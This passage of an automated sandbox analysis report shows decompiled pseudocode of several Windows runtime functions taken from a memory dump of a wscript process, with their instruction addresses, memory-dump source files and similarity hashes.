					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x5a37b9c; // 0x0
					_t74 = L05964620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E05989650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L059677F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0598F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E059813C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L059677F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E05989650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0594c608
0x0594c615
0x0594c625
0x0594c62d
0x0594c635
0x0594c640
0x0594c680
0x0594c687
0x0594c688
0x0594c689
0x0594c694
0x0594c694
0x0594c642
0x0594c64a
0x0594c697
0x059b7a25
0x059b7a2b
0x059b7a2e
0x059b7a30
0x059b7bea
0x059b7bea
0x00000000
0x059b7bea
0x059b7a36
0x059b7a43
0x059b7a48
0x059b7a4c
0x059b7a4e
0x00000000
0x00000000
0x059b7a58
0x059b7a5a
0x059b7a5b
0x059b7a5c
0x059b7a5d
0x059b7a63
0x059b7a64
0x059b7a6a
0x059b7a6c
0x059b7a6e
0x059b79cb
0x059b79cb
0x059b79ce
0x059b79d0
0x059b7a98
0x059b7a9b
0x059b7a9b
0x059b7a9e
0x059b7aa1
0x059b7bbe
0x059b7bbe
0x059b7bc0
0x059b7be0
0x059b7be0
0x059b7a01
0x059b7a01
0x059b7a05
0x059b7a07
0x059b7a15
0x059b7a15
0x059b7a1a
0x00000000
0x059b7a1a
0x059b7bc2
0x059b7bc6
0x059b7bc9
0x059b7bcd
0x059b7bcf
0x059b79e6
0x059b79e6
0x059b79eb
0x059b79eb
0x059b79ef
0x059b79f1
0x00000000
0x00000000
0x059b79f3
0x059b79f5
0x059b79ff
0x059b79ff
0x00000000
0x059b79ff
0x059b79f7
0x059b79fd
0x00000000
0x00000000
0x00000000
0x059b79fd
0x059b7bd5
0x059b7bd8
0x00000000
0x00000000
0x059b7ba9
0x059b7bac
0x059b7bb0
0x059b7bb1
0x059b7bb1
0x059b7bb6
0x00000000
0x059b7bb6
0x059b7aa7
0x059b7aaa
0x00000000
0x00000000
0x059b7ab2
0x059b7ab3
0x059b7ab5
0x059b7aec
0x059b7aef
0x059b7b25
0x059b7b28
0x059b7b62
0x059b7b64
0x059b7b8f
0x059b7b92
0x059b7b96
0x059b7b98
0x00000000
0x00000000
0x059b7b9e
0x059b7b9f
0x059b7ba3
0x00000000
0x059b7ba3
0x059b7b66
0x059b7b68
0x059b7ae2
0x059b7ae2
0x00000000
0x059b7ae2
0x059b7b6e
0x059b7b72
0x059b7b75
0x059b7b81
0x059b7b85
0x059b7b87
0x00000000
0x00000000
0x059b7b31
0x059b7b34
0x059b7b3c
0x059b7b45
0x059b7b46
0x059b7b4f
0x059b7b51
0x059b7b57
0x059b7b59
0x059b7b59
0x00000000
0x059b7b59
0x059b7b77
0x00000000
0x059b7b77
0x059b7b2a
0x00000000
0x059b7b2a
0x059b7af1
0x059b7af3
0x00000000
0x00000000
0x059b7afb
0x059b7afc
0x059b7afe
0x00000000
0x00000000
0x059b7b00
0x059b7b03
0x00000000
0x00000000
0x059b7b05
0x059b7b09
0x059b7b0d
0x059b7b0f
0x00000000
0x00000000
0x059b7b18
0x059b7b1d
0x00000000
0x059b7b1d
0x059b7ab7
0x059b7ab9
0x00000000
0x00000000
0x059b7abf
0x059b7ac1
0x00000000
0x00000000
0x059b7ac3
0x059b7ac6
0x00000000
0x00000000
0x059b7ac8
0x059b7acc
0x059b7ad0
0x059b7ad2
0x00000000
0x00000000
0x059b7adb
0x00000000
0x059b7adb
0x059b79d6
0x059b79d9
0x059b79dc
0x059b7a91
0x059b7a94
0x00000000
0x059b7a94
0x059b79e2
0x00000000
0x059b79e2
0x059b7a74
0x059b7a7a
0x00000000
0x00000000
0x059b7a8a
0x059b7a21
0x059b7a21
0x00000000
0x059b7a21
0x0594c650
0x0594c651
0x0594c656
0x0594c65c
0x0594c65d
0x0594c663
0x0594c664
0x0594c66a
0x0594c66e
0x059b79c5
0x059b79c7
0x00000000
0x059b79c7
0x0594c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15bd8d4730c0edc2553b8ab5ff90b181273a98921957c42af586231ced1ab142
Instruction ID: c45a5eea63df832b2732211721009fbea19a9f3dc0fc3790cb1b6bd1210239ef
Opcode Fuzzy Hash: 15bd8d4730c0edc2553b8ab5ff90b181273a98921957c42af586231ced1ab142
Instruction Fuzzy Hash: C38194756082018FFB15CF94CA80EBA77A9FBC4354F144A1AED469B241D370ED45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 059C6DC9 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E059C6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L05964620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E059C6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E05967D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E05989AE0();
					_t87 = L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E059C795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E059C795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E059C795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E059C795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L05964620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E059C6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E059C6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E059C6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E059C6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E05967D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E05989AE0();
								L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L05962400( &_v36);
							if(_v24 >= 0) {
								_t87 = L05962400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L05962400( &_v52);
							}
							if(_v28 >= 0) {
								return L05962400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x059c6dd4
0x059c6dde
0x059c6de1
0x059c6de3
0x059c6de6
0x059c6de9
0x059c6dec
0x059c6def
0x059c6df2
0x059c6df5
0x059c6dfe
0x059c6e04
0x059c6e09
0x059c6e0d
0x059c6e18
0x059c6e1b
0x059c6e22
0x059c6e2d
0x059c6e30
0x059c6e36
0x059c6e42
0x059c6e4d
0x059c6e50
0x059c6e55
0x059c6e5c
0x059c6e6e
0x059c6e5e
0x059c6e67
0x059c6e67
0x059c6e73
0x059c6e74
0x059c6e77
0x059c6e7c
0x059c6e7d
0x059c6e8e
0x059c6e93
0x059c6e9c
0x059c6ea8
0x059c6eab
0x059c6eac
0x059c6eb3
0x059c6ecd
0x059c6edc
0x059c6ee2
0x059c6ee5
0x059c6ef2
0x059c6efb
0x059c6f01
0x059c6f06
0x059c6f0b
0x059c6f11
0x059c6f1a
0x059c6f22
0x059c6f26
0x059c6f26
0x059c6f33
0x059c6f41
0x059c6f44
0x059c6f47
0x059c6f54
0x059c6f65
0x059c6f77
0x059c6f7c
0x059c6f82
0x059c6f91
0x059c6f99
0x059c6fa3
0x059c6fae
0x059c6fae
0x059c6fba
0x059c6fbb
0x059c6fbc
0x059c6fc1
0x059c6fc2
0x059c6fd3
0x059c6fd8
0x059c6fd8
0x059c6fdf
0x059c6fe8
0x059c6fee
0x059c6fee
0x059c6ff5
0x059c6ffb
0x059c6ffb
0x059c7004
0x00000000
0x059c700a
0x059c7004
0x059c6eb3
0x059c6e9c
0x059c7015

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 4edea63c87774117baf93580358d9d02e261a054dd0176666e0ce8f9951e6738
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: DD717E71A00209EFCB11DFA8C984AEEBBB9FF88714F1045A9E505E7250DB34FA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 059DB8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E059DB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x5a37b9c; // 0x0
				_t124 = L05964620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E05989800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E059895B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E059895D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L059677F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E05989910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E059895D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x5a37b9c; // 0x0
									_t92 = L05964620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E05989910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0594A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E059DE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E059DE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E059895B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x059db8d9
0x059db8e4
0x00000000
0x059db8e6
0x059db8f3
0x059db8f5
0x059db8f5
0x059db8f8
0x059db920
0x059db924
0x059db936
0x059db939
0x059db93d
0x059db948
0x059db9a0
0x059db9a0
0x059db9a4
0x059db9bf
0x059db9c4
0x059db9c6
0x059db9cd
0x059db9d1
0x059dbad4
0x059dbad8
0x059dbada
0x059dbadc
0x059dbadc
0x059dbadf
0x059dbae0
0x059dbae2
0x059dbae4
0x059dbaec
0x059dbaee
0x059dbaf0
0x059dbaf0
0x059dbaec
0x059dbafb
0x059dbafc
0x059dbafe
0x059dbb01
0x059dbb01
0x00000000
0x059dbb06
0x059db9d7
0x059db9db
0x059db9db
0x059db9de
0x059db9de
0x059db9e4
0x059db9e7
0x059db9ea
0x059db9ec
0x059db9ef
0x059db9f3
0x059dba1b
0x059dba1b
0x059dba23
0x059dba24
0x059dba27
0x059dba2a
0x059dba2b
0x059dba2e
0x059dba30
0x059dba37
0x059dba3f
0x059dba9c
0x059dbaa2
0x059dbb13
0x059dbb15
0x059dbaae
0x059dbaae
0x059dbab3
0x059dbab5
0x059dbaba
0x059dbac8
0x059dbac8
0x059dbaba
0x059dbacd
0x059dbacf
0x00000000
0x059dbacf
0x059dbb1a
0x00000000
0x059dbb1c
0x059dbaa7
0x059dbb11
0x00000000
0x059dbb11
0x059dbaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x059dba41
0x059dba41
0x059dba41
0x059dba58
0x059dba5d
0x059dba62
0x00000000
0x00000000
0x059dba64
0x059dba67
0x059dba68
0x059dba69
0x059dba6c
0x059dba6f
0x059dba71
0x059dba78
0x059dba80
0x00000000
0x00000000
0x059dba90
0x059dba90
0x059dba97
0x00000000
0x059dba97
0x059db9f5
0x059db9f7
0x059db9f7
0x059db9fa
0x059dba03
0x059dba07
0x059dba0c
0x059dba10
0x059dba17
0x00000000
0x059db9f7
0x059db9a6
0x059db9a8
0x059db9af
0x059db9b3
0x00000000
0x00000000
0x059db9b9
0x00000000
0x059db9b9
0x059db94d
0x059db98f
0x059db995
0x059db999
0x059db960
0x059db967
0x059db968
0x059db96a
0x00000000
0x059db96a
0x059db99b
0x059db99e
0x00000000
0x00000000
0x00000000
0x059db99e
0x059db951
0x059db954
0x059db95a
0x059db95e
0x059db972
0x059db979
0x059db97d
0x059db97f
0x059db980
0x059db982
0x059db984
0x00000000
0x059db984
0x00000000
0x059db926
0x00000000
0x059db926

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5e43d606da5018a6c91265143642d6fdfbf7dbca2704d226e033d695c0f5618
Instruction ID: 93405865701453ea442d90544a793bbc7849fd6f22562f2497c1a0ce01b0c6b6
Opcode Fuzzy Hash: a5e43d606da5018a6c91265143642d6fdfbf7dbca2704d226e033d695c0f5618
Instruction Fuzzy Hash: 0B710132200701AFDB21DF15C844F66F7EBFB84724F168928E6568B6A0DB79E944CF60

Uniqueness

Uniqueness Score: -1.00%

Function 059452A5 Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E059452A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0595EEF0(0x5a379a0);
					_t104 =  *0x5a38210; // 0x2a72d60
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0595EB70(_t93, 0x5a379a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E05989890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0595EEF0(0x5a379a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0595EB70(0, 0x5a379a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x2a72d6d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0597F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0595EEF0(0x5a379a0);
									__eflags =  *0x5a38210 - _t104; // 0x2a72d60
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x5a38210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E059C4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0595EB70(_t95, 0x5a379a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E059895D0();
											L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E059895D0();
											L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0595EB70(_t93, 0x5a379a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E059895D0();
										L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E059895D0();
										L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0597F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x059452a5
0x059452ad
0x059452b0
0x059452b3
0x059452b7
0x059452ba
0x059452bf
0x059452c4
0x059452cc
0x00000000
0x00000000
